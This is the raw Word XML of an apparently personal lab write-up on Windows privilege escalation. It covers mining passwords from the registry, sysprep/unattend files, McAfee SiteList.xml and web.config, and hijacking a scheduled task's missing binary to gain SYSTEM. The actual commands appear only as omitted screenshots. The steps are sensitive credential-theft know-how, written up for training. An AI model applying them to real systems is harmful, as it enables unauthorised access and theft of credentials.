              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="314F564C" w14:textId="6FA1C624" w:rsidR="008D76DF" w:rsidRDefault="008D76DF" w:rsidP="00D41993">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">We can see in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> login details</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3B3D41" w14:textId="5BBA47BE" w:rsidR="008D76DF" w:rsidRDefault="008D76DF" w:rsidP="00D41993">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C90D0DB" wp14:editId="5AA96009">
            <wp:extent cx="5362575" cy="13620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62575" cy="1362075"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="145F3A6A" w14:textId="2553C9F5" w:rsidR="008D76DF" w:rsidRDefault="008D76DF" w:rsidP="00D41993">
      <w:r>
        <w:t xml:space="preserve">Other way is dumping password from PowerShell  it use : </w:t>
      </w:r>
      <w:hyperlink r:id="rId85" w:history="1">
        <w:r w:rsidRPr="00CF7483">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Out-Minidump.ps1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A778643" w14:textId="4289797F" w:rsidR="008D76DF" w:rsidRDefault="008D76DF" w:rsidP="00D41993">
      <w:r>
        <w:t>after entering that password, we can dump the internet Explore and search password from it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F06D0AF" w14:textId="11542798" w:rsidR="008D76DF" w:rsidRDefault="00FE7392" w:rsidP="00D41993">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="647FA518" wp14:editId="78AC7185">
            <wp:extent cx="6324600" cy="2400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24600" cy="2400300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="71BE0344" w14:textId="7E0700DC" w:rsidR="005E0A5A" w:rsidRDefault="005E0A5A" w:rsidP="00D41993">
      <w:r>
        <w:t xml:space="preserve">After coping to attacker </w:t>
      </w:r>
      <w:r w:rsidR="00FE7392">
        <w:t>machine,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> we can use base 64 as decoder </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB904EF" w14:textId="20A4532C" w:rsidR="00FE7392" w:rsidRDefault="00FE7392" w:rsidP="00D41993">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5B178DF5" wp14:editId="7E70F858">
            <wp:extent cx="5943600" cy="18383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838325"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="108459FE" w14:textId="77777777" w:rsidR="00FE7392" w:rsidRDefault="00FE7392" w:rsidP="00D41993"/>
    <w:p w14:paraId="34461135" w14:textId="77777777" w:rsidR="00FE7392" w:rsidRDefault="00FE7392" w:rsidP="00D41993"/>
    <w:p w14:paraId="6166DCEF" w14:textId="72EC0A7C" w:rsidR="005E0A5A" w:rsidRDefault="005E0A5A" w:rsidP="00D41993"/>
    <w:p w14:paraId="645B1AD9" w14:textId="1226F309" w:rsidR="00BC4342" w:rsidRDefault="00BC4342" w:rsidP="00BC4342">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00BC4342">
        <w:lastRenderedPageBreak/>
        <w:t>Exercise 10 – Password Mining (Registry)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B4653AB" w14:textId="6733A7CC" w:rsidR="00BC4342" w:rsidRDefault="00AC2800" w:rsidP="00BC4342">
      <w:r>
        <w:t>After running Powerup It show Autologin details</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B3C552" w14:textId="34A006A9" w:rsidR="00AC2800" w:rsidRDefault="00AC2800" w:rsidP="00BC4342">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3C0148B7" wp14:editId="30C29A23">
            <wp:extent cx="5943600" cy="16776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677670"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A2C41FB" w14:textId="5B7CEEB3" w:rsidR="00AC2800" w:rsidRDefault="00AC2800" w:rsidP="00BC4342">
      <w:r>
        <w:t>In manually that command can run.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B695BD0" w14:textId="43B93CA3" w:rsidR="00AC2800" w:rsidRDefault="00AC2800" w:rsidP="00BC4342">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3232CD72" wp14:editId="77D29B24">
            <wp:extent cx="6309360" cy="14554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09360" cy="1455420"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="543D41BC" w14:textId="47EFCE3E" w:rsidR="00B054C1" w:rsidRDefault="00B054C1" w:rsidP="00BC4342">
      <w:r>
        <w:t>Some Default registry locations save the passwords</w:t>
      </w:r>
      <w:r w:rsidR="00B13829">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00BF33AF">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00B13829">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00BF33AF">
        <w:t xml:space="preserve">ome software </w:t>
      </w:r>
      <w:r w:rsidR="007A2866">
        <w:t>asks</w:t>
      </w:r>
      <w:r w:rsidR="00BF33AF">
        <w:t xml:space="preserve"> to save user </w:t>
      </w:r>
      <w:r w:rsidR="00E17380">
        <w:t>credentials</w:t>
      </w:r>
      <w:r w:rsidR="00BF33AF">
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidR="00B13829">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C5295F" w14:textId="77777777" w:rsidR="00B054C1" w:rsidRDefault="00B054C1" w:rsidP="00BC4342">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="37BD7BEB" wp14:editId="69F3C3E5">
            <wp:extent cx="5943600" cy="21634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163445"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ADB7BE5" w14:textId="7817ED74" w:rsidR="002A26B5" w:rsidRDefault="002A26B5" w:rsidP="00BC4342">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="093ACC45" wp14:editId="2E406964">
            <wp:extent cx="5943600" cy="47650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765040"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="48FD69F6" w14:textId="562A3657" w:rsidR="002A26B5" w:rsidRDefault="002A26B5" w:rsidP="00BC4342">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2C7382CB" wp14:editId="1BF6CF29">
            <wp:extent cx="5943600" cy="1625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625600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="345818E6" w14:textId="005F3877" w:rsidR="00AC2800" w:rsidRDefault="00B054C1" w:rsidP="00BC4342">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6005D2D8" w14:textId="77777777" w:rsidR="001F59CE" w:rsidRPr="00BC4342" w:rsidRDefault="001F59CE" w:rsidP="00BC4342"/>
    <w:p w14:paraId="616B5719" w14:textId="77777777" w:rsidR="008D76DF" w:rsidRDefault="008D76DF" w:rsidP="00D41993"/>
    <w:p w14:paraId="32024901" w14:textId="5659B02C" w:rsidR="00390EF8" w:rsidRDefault="00390EF8" w:rsidP="00D41993"/>
    <w:p w14:paraId="49C86A11" w14:textId="77777777" w:rsidR="007344E1" w:rsidRDefault="007344E1" w:rsidP="00D41993"/>
    <w:p w14:paraId="7427FCBC" w14:textId="77777777" w:rsidR="00390EF8" w:rsidRDefault="00390EF8" w:rsidP="00D41993"/>
    <w:p w14:paraId="068FBCC3" w14:textId="6B2DB5CF" w:rsidR="00390EF8" w:rsidRDefault="001F59CE" w:rsidP="001F59CE">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="001F59CE">
        <w:lastRenderedPageBreak/>
        <w:t>Exercise 11 – Password Mining (Configuration Files)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A4B431" w14:textId="687B5FB9" w:rsidR="001F59CE" w:rsidRDefault="001F59CE" w:rsidP="001F59CE">
      <w:r w:rsidRPr="001F59CE">
        <w:t>sysprep.inf</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="001F59CE">
        <w:t xml:space="preserve"> sysprep.xml</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="001F59CE">
        <w:t>unattend.xml</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F59CE">
        <w:t xml:space="preserve">are common files </w:t>
      </w:r>
      <w:r w:rsidR="009D7756">
        <w:t>save the configurations</w:t>
      </w:r>
      <w:r w:rsidRPr="001F59CE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009D7756">
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r>
        <w:t>password</w:t>
      </w:r>
      <w:r w:rsidRPr="001F59CE">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00D9067C">
        <w:t xml:space="preserve">That files </w:t>
      </w:r>
      <w:r w:rsidRPr="001F59CE">
        <w:t>m</w:t>
      </w:r>
      <w:r w:rsidR="009D7756">
        <w:t>ost</w:t>
      </w:r>
      <w:r w:rsidRPr="001F59CE">
        <w:t xml:space="preserve"> be base64-encoded</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED9B22B" w14:textId="42CFC2D7" w:rsidR="001F59CE" w:rsidRDefault="001F59CE" w:rsidP="001F59CE">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="13A60695" wp14:editId="68005A58">
            <wp:extent cx="5943600" cy="2880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80360"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="37729589" w14:textId="4D2BB6EF" w:rsidR="009F2781" w:rsidRDefault="00EE256A" w:rsidP="001F59CE">
      <w:r>
        <w:t>After opening that file, we can find encrypted password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2904049B" w14:textId="13593889" w:rsidR="00EE256A" w:rsidRDefault="00EE256A" w:rsidP="001F59CE">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="25A06816" wp14:editId="2747D8D7">
            <wp:extent cx="5943600" cy="41452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145280"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="60DAABD2" w14:textId="5E198112" w:rsidR="00C46BA9" w:rsidRDefault="00C46BA9" w:rsidP="001F59CE">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="067C0899" wp14:editId="5F629652">
            <wp:extent cx="4305300" cy="676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05300" cy="676275"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E06FDF8" w14:textId="4D4A0D9A" w:rsidR="00432B37" w:rsidRDefault="00432B37" w:rsidP="001F59CE">
      <w:r>
        <w:t>“certutil” have decode functionality so we can decode base 64 file using “certutil”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF8A61D" w14:textId="66C0AFC4" w:rsidR="00432B37" w:rsidRDefault="00432B37" w:rsidP="001F59CE">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0637EC8C" wp14:editId="7DBA14E6">
            <wp:extent cx="5943600" cy="12814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281430"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D991E60" w14:textId="54EB64B1" w:rsidR="0025750C" w:rsidRDefault="0047420A" w:rsidP="001F59CE">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4A031E5E" wp14:editId="102329D2">
            <wp:extent cx="5943600" cy="241236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412365"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6582C5D2" w14:textId="77777777" w:rsidR="00A377CD" w:rsidRDefault="00A377CD" w:rsidP="001F59CE"/>
    <w:p w14:paraId="7DFA7D83" w14:textId="541E17D5" w:rsidR="002548B4" w:rsidRDefault="002548B4" w:rsidP="001F59CE">
      <w:r w:rsidRPr="002548B4">
        <w:t>In a security analysis of the antivirus software</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002548B4">
        <w:t xml:space="preserve">McAfee VirusScan Enterprise (VSE), the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002548B4">
        <w:t>SySS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002548B4">
        <w:t xml:space="preserve"> GmbH could find a security vulnerability in the software </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">component </w:t>
      </w:r>
      <w:r w:rsidRPr="002548B4">
        <w:t>McAfee</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002548B4">
        <w:t>Security Agent (MSA)which can be used under certain conditions in order to per-form</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002548B4">
        <w:t>privilege escalation attacks</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002548B4">
        <w:t>within corporate networks</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="717EF5F7" w14:textId="0805487F" w:rsidR="002548B4" w:rsidRDefault="002548B4" w:rsidP="001F59CE">
      <w:r>
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidRPr="002548B4">
        <w:t>he software component</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002548B4">
        <w:t>McAfee Security Agent</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002548B4">
        <w:t>which is used for managing soft-ware updates of the antivirus software</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002548B4">
        <w:t>McAfee VirusScan Enterprise</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002548B4">
        <w:t>stores the con-figuration settings of the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002548B4">
        <w:t>Auto</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002548B4">
        <w:t>Update repository list1in two XML files namedSiteList.xmlandServerSiteList.xml.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DBAEA35" w14:textId="1270908E" w:rsidR="00893655" w:rsidRDefault="00893655" w:rsidP="001F59CE">
      <w:r>
        <w:t xml:space="preserve">resource: </w:t>
      </w:r>
      <w:hyperlink r:id="rId98" w:history="1">
        <w:r w:rsidRPr="00B9244C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.syss.de/fileadmin/dokumente/Publikationen/2011/SySS_2011_Deeg_Privilege_Escalation_via_Antivirus_Software.pdf</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03665B8D" w14:textId="08D2DA09" w:rsidR="000A4EDB" w:rsidRDefault="000A4EDB" w:rsidP="001F59CE"/>
    <w:p w14:paraId="1C034C62" w14:textId="14B4154E" w:rsidR="000A4EDB" w:rsidRDefault="000A4EDB" w:rsidP="001F59CE">
      <w:r>
        <w:t xml:space="preserve">I copied sitelist.xml file to kali and we can decrypt that password via specific python </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000A4EDB">
        <w:t>decrypt</w:t>
      </w:r>
      <w:r w:rsidR="004039A0">
        <w:t>o</w:t>
      </w:r>
      <w:r w:rsidRPr="000A4EDB">
        <w:t>r</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">.   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="590010B3" w14:textId="59A0243C" w:rsidR="00DE29FD" w:rsidRDefault="000A4EDB" w:rsidP="001F59CE">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="73053452" wp14:editId="7BD88D53">
            <wp:extent cx="6416040" cy="21488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16040" cy="2148840"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="75488712" w14:textId="5612802E" w:rsidR="004039A0" w:rsidRDefault="008F0562" w:rsidP="001F59CE">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="718ACB2D" wp14:editId="249AFA4F">
            <wp:extent cx="6438900" cy="29641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38900" cy="2964180"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ECC4F7C" w14:textId="1F121BAB" w:rsidR="001806BE" w:rsidRDefault="001806BE" w:rsidP="001F59CE"/>
    <w:p w14:paraId="14BC3DE0" w14:textId="7B2A9125" w:rsidR="001806BE" w:rsidRDefault="00A377CD" w:rsidP="001F59CE">
      <w:r>
        <w:t>In nmap scan find web service in victim machine so it has “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>web.config</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">” file </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB7F5D7" w14:textId="022D554F" w:rsidR="004039A0" w:rsidRDefault="004039A0" w:rsidP="001F59CE">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="202E6DE0" wp14:editId="485A94FD">
            <wp:extent cx="5943600" cy="18897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889760"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="515C666C" w14:textId="30CCFF76" w:rsidR="009F5EC7" w:rsidRDefault="00671A8C" w:rsidP="001F59CE">
      <w:r w:rsidRPr="00671A8C">
        <w:lastRenderedPageBreak/>
        <w:t>The file “C:\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00671A8C">
        <w:t>inetpub</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00671A8C">
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00671A8C">
        <w:t>wwwroot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00671A8C">
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00671A8C">
        <w:t>web.config</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00671A8C">
        <w:t>” is the website level config file of the Default website.</w:t>
      </w:r>
      <w:r w:rsidR="009F5EC7">
        <w:t>it contains password of server and other running application details.</w:t>
      </w:r>
      <w:r w:rsidR="009F5EC7" w:rsidRPr="009F5EC7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009F5EC7">
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009F5EC7" w:rsidRPr="009F5EC7">
        <w:t>connectionStrings</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009F5EC7">
        <w:t xml:space="preserve">” mean database.so we </w:t>
      </w:r>
      <w:r w:rsidR="003D5630">
        <w:t>copy</w:t>
      </w:r>
      <w:r w:rsidR="009F5EC7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009F5EC7">
        <w:t>web.config</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009F5EC7">
        <w:t xml:space="preserve"> file to C:\Temp folder because </w:t>
      </w:r>
      <w:r w:rsidR="003D5630">
        <w:t>all users</w:t>
      </w:r>
      <w:r w:rsidR="009F5EC7">
        <w:t xml:space="preserve"> have full privileged in that folder.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D7598B" w14:textId="4AE3D7EA" w:rsidR="009F5EC7" w:rsidRDefault="009F5EC7" w:rsidP="001F59CE">
      <w:r>
        <w:t>After copied</w:t>
      </w:r>
      <w:r w:rsidR="003D5630">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> we must</w:t>
      </w:r>
      <w:r w:rsidR="003D5630">
        <w:t xml:space="preserve"> register that service path and decrypt the “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003D5630" w:rsidRPr="009F5EC7">
        <w:t>connectionStrings</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003D5630">
        <w:t>” because we can find the password decrypting that part. “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003D5630">
        <w:t>web.config</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003D5630">
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="004039A0">
        <w:t xml:space="preserve"> file normally work with asp.net framework, v2.0 is common version, that’s the reason we are using v.20 to register that file path.  </w:t>
      </w:r>
      <w:r w:rsidR="00CA5E34">
        <w:t xml:space="preserve">But unfortunately, cannot do it because his script miss configures that part </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB9D462" w14:textId="74D1E74A" w:rsidR="007F70EB" w:rsidRDefault="007F70EB" w:rsidP="001F59CE"/>
    <w:p w14:paraId="33F5EFB5" w14:textId="56BDF968" w:rsidR="00CA5E34" w:rsidRDefault="00CA5E34" w:rsidP="001F59CE">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5435D032" wp14:editId="75A5129B">
            <wp:extent cx="5943600" cy="26974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97480"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A16FFA" w14:textId="59442BED" w:rsidR="00A377CD" w:rsidRDefault="00A377CD" w:rsidP="001F59CE"/>
    <w:p w14:paraId="24FA519B" w14:textId="10556194" w:rsidR="00AC4B91" w:rsidRDefault="002409BA" w:rsidP="002409BA">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="002409BA">
        <w:t>Exercise 12 – Scheduled Tasks (Missing Binary)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D037D5B" w14:textId="17565A9A" w:rsidR="002409BA" w:rsidRDefault="002409BA" w:rsidP="002409BA">
      <w:r>
        <w:t>For this one need “Autoruns64.exe” after running that exe under schedule task it has “My Task2” so we can add that place to malicious content and get the system authority using that.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C493D6" w14:textId="4435D900" w:rsidR="002409BA" w:rsidRPr="002409BA" w:rsidRDefault="002409BA" w:rsidP="002409BA">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251674112" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2F43F6D4" wp14:editId="0FE5E49F">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-502920</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-1270</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="7101840" cy="1920240"/>
            <wp:effectExtent l="0" t="0" r="3810" b="381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7101840" cy="192024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53C2083" w14:textId="70E537E3" w:rsidR="002409BA" w:rsidRPr="002409BA" w:rsidRDefault="002409BA" w:rsidP="002409BA"/>
    <w:p w14:paraId="1617F084" w14:textId="02432B68" w:rsidR="00AC4B91" w:rsidRDefault="00AC4B91" w:rsidP="001F59CE"/>
